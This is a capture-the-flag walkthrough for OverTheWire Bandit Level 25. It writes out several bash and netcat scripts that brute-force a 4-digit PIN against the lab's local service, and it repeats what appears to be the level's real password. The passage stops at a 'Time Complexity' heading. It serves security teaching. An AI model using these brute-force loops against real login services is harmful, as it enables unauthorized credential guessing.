🔓 OverTheWire Bandit Level 25: Introduction to Brute-Forcing and Network Services

Level 25 introduces brute-forcing—systematically trying all possible combinations to find the correct password or PIN. This level teaches you how to automate attacks against network services, use loops in bash, and understand why brute-forcing works (and when it doesn't).

Level 25 teaches you:

What brute-forcing is and how it works
Creating loops in bash scripts
Connecting to network services with netcat
Automating repetitive attacks
Optimizing brute-force scripts

If you've made it this far, you can write scripts. Now you're learning how to automate attacks—this is a fundamental skill in penetration testing and security research.

🎯 The Objective

After logging into bandit24, your goal is to find the password for Level 25. A daemon is listening on port 30002 that requires two things: the password for bandit24 and a secret 4-digit PIN (0000-9999). There's no way to retrieve the PIN except by trying all 10,000 possible combinations.

What Level 25 teaches:

Understanding brute-forcing
Creating loops in bash
Network service exploitation
Automating attacks
Handling network connections

The challenge: Create a script that tries all possible PIN combinations (0000-9999) combined with the bandit24 password until you find the correct one.

🔍 Understanding the Problem

Let's start by connecting to Level 24 and exploring:

sshpass -p `cat bandit24` ssh bandit24@bandit.labs.overthewire.org -p 2220

Once connected, let's test the service:

nc localhost 30002

What happens: The service prompts you for the bandit24 password and a 4-digit PIN.

The problem: You need to try all 10,000 possible PIN combinations (0000-9999) to find the correct one. Doing this manually would take forever, so you need to automate it.

🧠 What Is Brute-Forcing? Understanding Automated Attacks

Here's what's happening: Brute-forcing is systematically trying all possible combinations until you find the correct one.

How Brute-Forcing Works

Brute-force attack is a trial-and-error method where you:

Generate all possible combinations
Try each combination
Check if it's correct
Repeat until successful

Why it works:

If the PIN is truly random, brute-forcing will eventually find it
With only 10,000 possibilities, it's feasible
No smarter attack exists (no hints, no patterns)

Why it might not work:

Rate limiting (too many attempts blocked)
Account lockouts
Time constraints (takes too long)
Large search spaces (millions/billions of combinations)

Understanding the Search Space

4-digit PIN:

Range: 0000 to 9999
Total combinations: 10,000
Average attempts: 5,000 (if random)
Maximum attempts: 10,000 (worst case)

Why 10,000 is manageable:

Can be done in minutes to hours
Scriptable and automatable
No special tools needed

If it were 8 digits:

Range: 00000000 to 99999999
Total combinations: 100,000,000
Would take much longer (days/weeks)

Network Service Brute-Forcing

The pattern:

Connect to service
Send credentials (password + PIN)
Receive response
Check if successful
Repeat with next PIN

In Level 25:

Service: localhost:30002
Format: password PIN (space-separated)
Response: Success message if correct, error if wrong

📋 Step-by-Step Walkthrough

Step 1: Connect to Level 24

sshpass -p `cat bandit24` ssh bandit24@bandit.labs.overthewire.org -p 2220

Step 2: Get the bandit24 Password

You'll need the bandit24 password for the brute-force:

cat /etc/bandit_pass/bandit24

Copy this password—you'll use it in your script.

Step 3: Test the Service Manually

Let's understand how the service works:

nc localhost 30002

What you'll see:

I am the pincode checker for user bandit25. Please enter the password for bandit24 and the secret pincode on a single line, separated by a space.

Try a test:

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1234

Response if wrong:

Wrong! Please try again.

Response if correct:

Correct!
The password of user bandit25 is [password]

Step 4: Create a Temporary Directory

mkdir -p /tmp/m1k3
cd /tmp/m1k3

Step 5: Create Your Brute-Force Script

Create a script that loops through all PINs:

cat > bruteforce.sh << 'EOF'
#!/bin/bash

PASSWORD="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

for i in {0000..9999}; do
    echo "Trying PIN: $i"
    echo "$PASSWORD $i" | nc localhost 30002 | grep -v "Wrong"
    if [ $? -eq 0 ]; then
        echo "Found it! PIN: $i"
        break
    fi
done
EOF

Important: Replace UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ with the actual bandit24 password you got in Step 2.

Breaking this down:

PASSWORD="..." — Stores the bandit24 password
for i in {0000..9999} — Loops from 0000 to 9999
echo "$PASSWORD $i" — Creates "password PIN" format
| nc localhost 30002 — Sends to the service
grep -v "Wrong" — Filters out wrong attempts
if [ $? -eq 0 ] — Checks if grep found something (success)

Step 6: Make Script Executable

chmod +x bruteforce.sh

Step 7: Run the Brute-Force

./bruteforce.sh

What happens:

Script tries PIN 0000, 0001, 0002, etc.
Each attempt connects to the service
When it finds the correct PIN, it displays the password

Note: This can take a while. The service might be slow, and you're trying up to 10,000 combinations.

Step 8: Alternative: Faster Method with File Output

If you want to see all results or optimize the process:

cat > bruteforce-fast.sh << 'EOF'
#!/bin/bash

PASSWORD="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

# Generate all combinations
for i in {0000..9999}; do
    echo "$PASSWORD $i" >> combinations.txt
done

# Try all at once and save results
cat combinations.txt | nc localhost 30002 > results.txt

# Find the correct one
grep -v "Wrong" results.txt
EOF

chmod +x bruteforce-fast.sh
./bruteforce-fast.sh

Why this is faster:

Generates all combinations first
Sends them all in one connection
Processes results afterward
Less overhead from multiple connections

Step 9: Extract the Password

Once the script finds the correct PIN, you'll see output like:

Correct!
The password of user bandit25 is [PASSWORD_HERE]

Copy that password.

Step 10: Save the Password

On Linux/macOS:

echo "PASSWORD_HERE" > bandit25

On Windows (PowerShell):

"PASSWORD_HERE" | Out-File -FilePath bandit25 -NoNewline

Step 11: Connect to Level 25

sshpass -p `cat bandit25` ssh bandit25@bandit.labs.overthewire.org -p 2220

💡 Understanding Brute-Forcing in Depth

Let's dive deeper into brute-forcing concepts:

Loop Constructs in Bash

Bash range expansion:

{0000..9999}  # Generates: 0000, 0001, 0002, ..., 9999

For loop syntax:

for variable in list; do
    commands
done

Example:

for i in {1..10}; do
    echo $i
done

Network Connection Patterns

Single connection:

echo "data" | nc host port

Multiple connections:

for i in {1..10}; do
    echo "data $i" | nc host port
done

Batch connection:

cat file.txt | nc host port

In Level 25: We use batch connection for efficiency—send all combinations in one connection rather than 10,000 separate connections.

Optimizing Brute-Force Scripts

Method 1: Sequential (Simple but Slow)

for i in {0000..9999}; do
    echo "$PASSWORD $i" | nc localhost 30002
done

Pros: Simple, easy to understand Cons: Slow (one connection per attempt)

Method 2: Batch (Faster)

# Generate all combinations
for i in {0000..9999}; do
    echo "$PASSWORD $i" >> file.txt
done
# Send all at once
cat file.txt | nc localhost 30002 > results.txt

Pros: Faster (one connection total) Cons: More complex, harder to see progress

Method 3: Parallel (Fastest, but complex)

# Run multiple attempts in parallel
# (Advanced, not needed for Level 25)

For Level 25: Method 2 (batch) is usually fastest and most reliable.

🔒 Real-World Context

Why does this matter in penetration testing?

Brute-forcing is a common attack technique:

1. Password Attacks

In real assessments, you might brute-force:

SSH passwords
Web application logins
Database credentials
API keys
PIN codes

The technique: Same as Level 25—try all combinations until you find the correct one.

2. Rate Limiting and Defenses

Real-world challenges:

Rate limiting (too many attempts = blocked)
Account lockouts (too many failures = account locked)
CAPTCHAs (human verification required)
IP blocking (too many attempts = IP banned)

Why Level 25 works:

No rate limiting
No account lockouts
Small search space (10,000 combinations)
Local service (fast connection)

3. Brute-Force Tools

Common tools:

Hydra — Network login cracker
Medusa — Parallel login brute-forcer
John the Ripper — Password cracker
Hashcat — Advanced password recovery

The skill you're learning: How to create custom brute-force scripts. This is essential for:

Custom attack scenarios
Understanding how tools work
Creating targeted attacks
Learning automation

4. Real-World Examples

Common scenarios:

Brute-forcing SSH with common passwords
Attacking web login forms
Cracking encrypted files
Finding API keys

The skill you're learning: How to automate repetitive attacks. This is fundamental for:

Penetration testing
Security research
Understanding attack automation
Developing defenses

🛠️ Alternative Methods

Here are different ways to approach Level 25:

Method 1: Simple Loop (Recommended for Learning)

#!/bin/bash
PASSWORD="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for i in {0000..9999}; do
    echo "Trying $i"
    RESULT=$(echo "$PASSWORD $i" | nc localhost 30002)
    if echo "$RESULT" | grep -q "Correct"; then
        echo "$RESULT"
        break
    fi
done

Pros: Simple, shows progress Cons: Slower (one connection per attempt)

Method 2: Batch Method (Faster)

#!/bin/bash
PASSWORD="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
# Generate combinations
for i in {0000..9999}; do
    echo "$PASSWORD $i"
done | nc localhost 30002 | grep -v "Wrong"

Pros: Faster, single connection Cons: Less visible progress

Method 3: With Progress Tracking

#!/bin/bash
PASSWORD="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
COUNT=0
for i in {0000..9999}; do
    COUNT=$((COUNT + 1))
    if [ $((COUNT % 100)) -eq 0 ]; then
        echo "Tried $COUNT combinations..."
    fi
    RESULT=$(echo "$PASSWORD $i" | nc localhost 30002)
    if echo "$RESULT" | grep -q "Correct"; then
        echo "Found at attempt $COUNT: PIN $i"
        echo "$RESULT"
        break
    fi
done

Pros: Shows progress, tracks attempts Cons: Still slower than batch method

For Level 25, use Method 2 — it's the fastest and most efficient.

🚨 Common Mistakes

Mistake 1: Wrong Password Format

Wrong:

echo "$PASSWORD$i" | nc localhost 30002  # Missing space!

Right:

echo "$PASSWORD $i" | nc localhost 30002  # Space between password and PIN

Why: The service expects "password PIN" with a space separator.

Mistake 2: Not Using Zero-Padded Numbers

Wrong:

for i in {0..9999}; do  # Generates: 0, 1, 2, ..., 9999

Right:

for i in {0000..9999}; do  # Generates: 0000, 0001, ..., 9999

Why: The PIN is 4 digits. 0 is different from 0000. The service likely expects exactly 4 digits.

Mistake 3: Not Handling Disconnections

Wrong: Running script, getting disconnected, starting over from 0000.

Right: Modify script to start from where you left off:

# If you got disconnected at 0038
for i in {0038..9999}; do
    # ... rest of script

Why: No point re-trying combinations you've already tested.

Mistake 4: Not Saving Results

Wrong: Running script without saving output, missing the correct PIN.

Right: Save output to a file:

./bruteforce.sh 2>&1 | tee output.txt

Why: If you miss the output or get disconnected, you can check the file.

Mistake 5: Using Wrong Password

Wrong: Using an old password or making a typo.

Right: Get the current password fresh:

PASSWORD=$(cat /etc/bandit_pass/bandit24)

Why: Make sure you're using the correct bandit24 password.

💻 Practice Exercise

Try these to reinforce what you learned:

Create a simple loop:

for i in {1..10}; do
    echo "Number: $i"
done

Practice with zero-padding:

for i in {0000..0010}; do
    echo "PIN: $i"
done

Test netcat connection:
```
echo "test" | nc localhost 30002
```

Create a simple brute-force:

# Try just 10 PINs to test
for i in {0000..0009}; do
    echo "Trying $i"
    echo "password $i" | nc localhost 30002
done

🎓 Understanding Attack Automation

This level introduces attack automation concepts:

What Is Attack Automation?

Attack automation is using scripts and tools to perform repetitive attacks:

Identify the target — What are you attacking?
Understand the format — What does the service expect?
Generate combinations — Create all possible inputs
Automate testing — Try each combination
Process results — Identify successful attempts

Why Automation Matters

Understanding automation is essential for:

Penetration testing
Security research
Understanding how attacks work
Developing defenses
Learning security tools

The skill you're learning: How to automate attacks. This is fundamental for:

Penetration testing
Security research
Understanding attack techniques
Developing security tools

🔗 What's Next?

Level 26 will likely introduce another system concept. You'll continue building on the concepts you've learned about scripting, automation, and exploitation.

Before moving on, make sure you:

✅ Understand what brute-forcing is
✅ Can create loops in bash
✅ Know how to connect to network services
✅ Can automate repetitive tasks
✅ Understand when brute-forcing is feasible

📚 Key Takeaways

After completing Level 25, you should understand:

Brute-forcing — Systematically trying all combinations
Bash loops — Using for loops to iterate
Network services — Connecting and interacting with services
Automation — Scripting repetitive attacks
Optimization — Making brute-force attacks faster

🎯 Quick Reference

Concept	Explanation	Example
Brute-force	Try all combinations	Loop through 0000-9999
For loop	Iterate over range	`for i in {0000..9999}`
Zero-padding	Add leading zeros	`0000` not `0`
Netcat	Network connection	`echo "data" \| nc host port`
Batch attack	Send all at once	`cat file \| nc host port`

🔍 Advanced: Understanding Brute-Force Complexity

If you want to go deeper, here's the math behind brute-forcing:

Time Complexity